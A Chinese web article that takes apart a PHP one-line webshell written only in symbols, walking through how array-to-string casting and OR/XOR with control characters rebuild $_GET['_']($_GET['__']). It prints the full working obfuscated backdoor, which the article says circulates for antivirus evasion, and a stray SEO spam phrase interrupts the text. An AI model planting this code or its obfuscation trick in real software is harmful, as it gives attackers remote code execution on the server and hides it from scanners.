剖析PHP纯符号一句话webshell的代码

网络安全 2021-07-03 10:02www.168986.cn网络安全知识


复制代码
代码如下:

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
${'_'.$_}['_'](${'_'.$_}['__']);
?>

以上是网上流传的一段由纯符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。

第一行$_="";
定义一个以下划线作为命名的字符变量$_,赋值为空。
此行实际上不影响代码执行效果,仅增加混淆效果。

第二行$_[+""]='';
定义一个$_数组元素,其key为+"",赋值为空。
众所周知,PHP是个弱类型语言,也就是说PHP并不严格验证变量类型,所以这里+""作为数组了key,其值等同于0,所以此行等同于$_[0]='';
此时$_被定义为数组,覆盖上一行的定义。

第三行$_="$_"."";
将变量$_强制转换为字符串,因为此时$_类型为数组,强制转换后的结果为字符串"Array"(string(5) "Array" ),而非数组元素的值。

第四行$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
这一行涉及到计算机二进制的“或运算”和“异或运算”,这里先简单介绍下这两种运算规则
1、或运算,符号为 |
运算规则0|0=0; 0|1=1; 1|0=1; 1|1=1;
简单来说,或运算前后两个对象 只要有 一个为1,其值就为1,否则为0
2、异或运算,符号为 ^
运算规则0^0=0; 0^1=1; 1^0=1; 1^1=0;
简单来说,异或运算可以看成是判断前后两个对象是否相等的,如果两个对象不同(即为异),则值为1,否则为0

再回到代码上来,此行代码分三个部分($_[+""]|"")、($_[+""]|"")、($_[+""]^""),用连接符“.”号相连,每个部分都是其中两个对象进行"或运算"或"异或运算"。
先看第一部分($_[+""]|""),很明显,这里是$_[+""]和""这两个对象进行“或运算”。
第一个对象$_[+""](也就是$_[0]),要注意其值已经不是第二行定义的空值,因为在第三行时$_变量已经被覆盖定义为字符串“Array”。这里涉及到另一个php知识细节对于 字符串[数字] 结构,字符串将会当成数组处理,返回以后面数字作为索引的元素值,例如$x='abcd9.',则$x[4]='9'。可见,$_[+""]值为字符串“Array”第一字符“A”。
第二个对象""是一个特殊字符(注意这不是短横,虽然长得很像,实际上是个特殊字符,此类符号在某些环境下无法识别而作为乱码处理。后面两部分中的特殊字符也如此。),暂不管为什么此处是这个特殊字符而不是其他字符,先在此行下增加一行测试代码显示这一行定义的$_值
var_dump($_);
测试结果为string(3) "GET" ,可见,($_[+""]|"").($_[+""]|"").($_[+""]^"")值"GET",显而易见,($_[+""]|"")值为“G”,($_[+""]|"")值为“E”,($_[+""]^"")值为“T”。
再先看第一部分($_[+""]|"")值为"G",上面已得到$_[+""]值为“A”,即("A"|"")="G",狼蚁网站SEO优化分析下此等式
“A”二进制0100 0001
“G”二进制0100 0111
0100 0001 | x = 0100 0111
通过或运算规则推导并参考ASCII码对照表,x值可能有以下几个结果

复制代码
代码如下:

01000110 //ASCII可显示字符F
01000111 //ASCII可显示字符G
00000110 //ASCII控制字符ACK,代表“确认回应”
00000111 //ASCII控制字符BEL,代表“响铃”

代码中的""即为ASCII控制字符ACK。其实三个字符也适用,为了增加混淆效果故采用这种特殊字符。
搞清楚第一部分,第二、第三部分也同理可推。

第五行${'_'.$_}['_'](${'_'.$_}['__']);
此行可通过小括号分成两部分${'_'.$_}['_'] 和 ${'_'.$_}['__'],两部分结构均是${A}['B'],区别仅是后面B是一条下划线还是两条小划线。
先看相同部分${'_'.$_},这里涉及到大括号{}在php中的特性一个在变量间接引用中进行定界,如"$abc"为变量$abc,而"${a}bc"为变量$a连接字符"bc",了解了这一特性,而第四行对$_赋值为“GET”,可见${'_'.$_}即为变量$_GET,加上后面['_'],则为$_GET['_'],接收"get"的表单中的变量为'_'的值。小括号里的部分同理。
根据上面叙述,第五行代码还原后是$_GET['_']($_GET['__']);

至此,这段混淆代码已原形毕露,一句话后门代码原形为$_GET['_']($_GET['__']),传递特殊参数构建webshell链接网址(例如])),通过一句话木马客户端即可连接此URL。

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by